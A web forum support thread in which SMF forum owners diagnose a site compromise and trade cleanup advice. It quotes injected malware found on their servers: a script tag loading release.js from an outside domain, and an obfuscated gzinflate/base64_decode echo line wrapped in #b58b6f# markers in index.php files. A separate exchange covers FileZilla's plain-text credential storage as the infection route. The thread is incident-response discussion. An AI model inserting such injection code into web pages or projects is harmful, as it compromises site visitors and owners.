Preview broken, possible hack?

[Venera]

Hello there.

I noticed problems with "preview" button on my 2.0.2 forum today. I started to search for problems when i saw this code at the end of my source:

Code Select Expand

</body></html><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script>

As that is code after html tags i guess it is causing preview of post not to show, so i tried to find that code in my files. I searched all my files for "organicfood" and i just find it in one file (not related to smf):

Code Select Expand

\www\stats\webalizer\index.html (1 hits)
Line 22: <BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000"><!--b58b6f--><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><!--/b58b6f-->

I tried to remove that code from index.html file, and when i'm looking to page source i still can see it at the end of page!

I also must note that i did not add that code myself, and i'm the only administrator at my forum (no one else have ftp/login details). I searched for organicfood code, and i saw that many people reported that their sites are hacked with that code added. I don't have anything on my server besides smf also.
Nothing in error log.

Forum url: venerinsan.com

Any suggestions please, is my forum/server hacked and how can i remove that code and fix preview problem?

Regards.

[kat]

Have a look at the files on your site. Do any of them have recent datestamps?

If so, have a look at them, especially for "eval base64_decode" stuff, which'll usually be on the first line, or thereabouts.

In a word or three, yes, I think you've been hacked.

Got a valid backup of the software on your site? (He asks, expecting the answer "No").

[Venera]

Hey.

Yes, i do have a working backup, but i wanted to see if I can just remove code and fix my forum on that way, without loosing data posted in the mean time.

You think that i should search for base64_decode text in smf files now?
I dont know about datestamps, can you help me about it?

Regards.

[Aleksi "Lex" Kilpinen]

If you have an ftp client like filezilla, you'll be able to see the files last modification time. If there are edits done to files recently, you should check those files for anythin out place - iframes, javascripts, eval-codes etc.
You should also be on the lookout for any files on your account that are not part of SMF, and you think shouldn't be there.

If you find any traces of an actual hacking, you might also want to contact your host - it's not uncommon for hackers to compromise several accounts at the same time, if they can gain access to one first. So it might be the server was hacked, not just you.

[Dzonny]

Okay, just had the same report for one of my forums.
The same script was in the source, so i searched through all my files and find nothing. Then i opened index.php and at the end i found this:

Code Select Expand


#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

That is the code that should be removed from every index.php file inside your forums directory. I just fixed all that, and code disappeared from page source.

I don't know how this happened, but i just wanted to post solution here so if more members have similar problem they can fix it easely. (although it's not so "easy", there is plenty of index.php files inside forums dir though)

This problem is fixed, so i'm marking this topic as solved. (i fixed it for Venera)

[rickheck]

Just a waning. If you are using FileZilla as your FTP client, there is malware out there that will grab your FTP credentials from the Filezilla PLAIN TEXT FILE (yikes!  ) and use that information to insert that malware code (indicated by the #b58b6f# type of code around a "gzinflate(base64_decode)" command. That is how your files will get attacked/compromised.

Look in your %APPDATA%/Roaming/Filezilla folder. One of the XML files in there has all your FTP web site credential (user/password/etc) in PLAIN TEXT!  And the FileZilla people refuse to fix that obvious security hole.

My recommendation: delete FileZilla from your computer (and you have to manually delete the folder in your APPDATA folder. 

If you need a secure FTP client, use WinSCP (www .winscp .net ), where you can set a master password and all of your site credentials are encrypted.

Just a warning....Rick...

[MrPhil]

All FTP clients transfer passwords in clear text (that's the protocol), but it's inexcusable that FZ would store it in the open! I wonder how other clients store passwords? I know that FTP Commander encrypts it in some format. I suppose that once you know the algorithm used, and can figure out where the key comes from, that any list would be easily cracked, but at least there would be some work involved.

This is a second strike against FZ. There's a big debate going on in the Bugs board about the fact that SMF stores attachments and avatars with hashed names with no extension (filetype). If you use FZ to do a backup, with automatic mode selection, it will choose ASCII for these files and will thus corrupt any binary files in your backup! The SMF developers say, "That's not our fault; it's an FZ bug so we don't need to do anything about it," and the FZ developers have been saying for years that, "All the extension-less files we ever transfer are text, so ASCII is appropriate." The bottom line is don't use Filezilla to back up your site!

[Aleksi "Lex" Kilpinen]

FileZilla is fine, it's a good client - you just need to make sure you know the oddities of it. A wise user learns the settings, and tests the results, before trusting any software.

Just like actually keeping a plain text file of all your passwords ever should be safe for you to have on your computer, you just need to make sure your computer is clean and protected. A wise user does not keep them saved in the client forever, but deletes them when they are not needed.

Bottom line, Filezilla can be safely used, when you know what you do, and use some common sense.